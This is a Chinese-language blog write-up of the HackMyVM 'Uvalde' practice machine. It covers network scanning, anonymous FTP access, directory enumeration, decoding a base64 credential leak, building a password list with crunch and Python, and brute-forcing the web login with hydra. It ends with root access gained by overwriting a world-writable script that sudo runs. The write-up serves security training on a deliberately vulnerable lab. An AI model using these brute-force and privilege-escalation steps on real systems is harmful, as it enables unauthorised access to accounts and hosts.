HackMyVM-Uvalde靶机WP
城南花已开 Lv5

信息收集

服务探测

扫靶机ip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:3a:91:cf (Unknown)
192.168.56.114 08:00:27:65:8d:c9 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.844 seconds (138.83 hosts/sec). 3 responded
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:30 EDT
Nmap scan report for 192.168.56.114
Host is up (0.00036s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:65:8D:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

nmap扫一下先

发现有个ftp服务,那就尝试通过匿名账号登上去看看有啥

在这里用nmap -sV 192.168.56.114也能扫到21端口允许匿名访问image

Ftp登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.56.114
Connected to 192.168.56.114.
220 (vsFTPd 3.0.3)
Name (192.168.56.114:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||25004|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 116 4096 Jan 28 2023 .
drwxr-xr-x 2 0 116 4096 Jan 28 2023 ..
-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output
226 Directory send OK.

使用get将output(文本文件)下载到本地

cat发现给了提示,找到用户名为matthew的linux用户image

那就换个方向从80端口找一下

用gobuster扫一下目录,第一次没扫出来,换了下文件名扫了好一会才出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 29604]
/img (Status: 301) [Size: 314] [--> http://192.168.56.114/img/]
/login.php (Status: 200) [Size: 1022]
/user.php (Status: 302) [Size: 0] [--> login.php] #
/mail (Status: 301) [Size: 315] [--> http://192.168.56.114/mail/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.114/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.114/js/]
/success.php (Status: 302) [Size: 0] [--> login.php] #
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.114/vendor/]
/create_account.php (Status: 200) [Size: 1003] #
Progress: 39458 / 622932 (6.33%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 39474 / 622932 (6.34%)
===============================================================
Finished
===============================================================

发现有用的信息都标了#

当我使用/create_account.php创建账户时发现只需要输入用户名,密码呢???起初卡了一会,后来看响应包success有个传参有点像base64编码

image

1
2
3
┌──(kali㉿kali)-[~]
└─$ echo -n "dXNlcm5hbWU9dGVzdDEmcGFzc3dvcmQ9dGVzdDEyMDI0QDk0MzQ=" |base64 -d
username=test1&password=test12024@9434

好的,登入进去,结果……

image

我发现前面用户名还没用上,matthew这个用户名密码可能和ssh的密码一致,那么只需要尝试爆破login.php页面就行

但是密码无脑爆破也不太可能,加上符号大小写英文爆破一年都爆不出,通过观察上面的创建账户发现密码时有个格式

image

密码生成

username+2024@xxxx 后四位应该是随机创建

那这就很简单明了了,密码就是matthew@2024????了

使用crunch生成密码(也可以用python写一个 见下文)

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ crunch 16 16 -t matthew@2024%%%% >pass.list
##后面cat了一下发现不会生成带有@特殊符号的只有z,需要加上-l
┌──(kali㉿kali)-[~]
└─$ crunch 16 16 -t matthew2024@%%%% -l aaaaaaaaaaa@aaaa>pass.list
##这样就可以了
##具体参数什么意思直接GPT

解释:

  • 16 16 指定生成密码的长度为 16 个字符。

  • -t matthew2024@%%%%
    
    1
    2
    3
    4
    5
    6
    7
    8

    定义了密码的模板,其中:

    - `matthew@2024` 是固定的部分。
    - `%%%%` 是可变部分,代表 4 个随机数字。

    - ```
    -l aaaaaaaaaaa@aaaa
    指定了模板中每个字符的位置类型: - `a` 代表字母(小写或大写)。 - `@` 代表固定的特殊字符 `@`。 - `a` 后面的 `aaaa` 代表四位数字的位置。

在这种情况下,-l 参数其实没有增加太多额外的控制,因为模板已经非常明确地指定了每个字符的类型。但使用 -l 参数可以增强可读性,并帮助理解密码模式的每个部分的角色。它在更复杂的密码生成场景中会更加有用,比如混合使用大写、小写字母、数字和特殊字符时。

python脚本也能用

1
2
3
4
5
6
user = 'matthew2024@'

with open('test.txt', 'w') as f:
for num in range(1,10000):
correct_num = str(num).zfill(4)##zfill是在左侧填充0
f.write(user+correct_num+'\n')##拼接换行写入test.txt

Http爆破

后面就爆破了我这边用了burpsuite,hydra九头蛇也可以,但我觉得burp比较适合我

burp一下就出来了但是找不到密码,后面看了wp才知道这个靶机是2023年的时间变了,密码没变hhhhh

在2024的今天,在做靶场已经不行了,只能按照原来的密码上了

image

matthew2023@1554

发现burp我还没研究透哇

这边直接就可以生成密码进行攻击

payload改成number加个前缀就行了,照样也能出来image

这个顺便插个从别人wp上抄来的hydra爆破http表单的方法image

image

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ hydra -l matthew -P matth.list 192.168.56.114 http-post-form '/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05 05:42:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.56.114:80/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">
[80][http-post-form] host: 192.168.56.114 login: matthew password: matthew2023@1554
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05 05:42:47
##事实发现hydra好像更方便,图形化的burp有点卡

用户提权

ssh登入上拿到user了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:S2tp/jV32/GtUP68f14Rac4/yZXhbMmyut+ZqO+ZOl4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux uvalde.hmv 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
matthew@uvalde:~$ ls
user.txt
matthew@uvalde:~$ cat user.txt
6e4136fbed8f8c691996dbf42697d460

Root提权

Sudo提权

sudo -l发现有个脚本文件可以使用root身份执行,而且发现这个目录其他用户是可读可写可执行,那直接把superhack删掉,重新写个上去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
matthew@uvalde:/opt$ sudo -l
Matching Defaults entries for matthew on uvalde:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User matthew may run the following commands on uvalde:
(ALL : ALL) NOPASSWD: /bin/bash /opt/superhack##可以执行bash 和superhack
matthew@uvalde:~$ rm -rf /opt/superhack
matthew@uvalde:/opt$ echo -n "bash"> superhack
matthew@uvalde:/opt$ sudo /bin/bash /opt/superhack
root@uvalde:/opt# cd ~
root@uvalde:~# ls
root.txt
root@uvalde:~# cat root.txt
59ec54537e98a53691f33e81500f56da

完结,这个easy的靶机都做了两个钟,看来还是任重而道远哇

由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k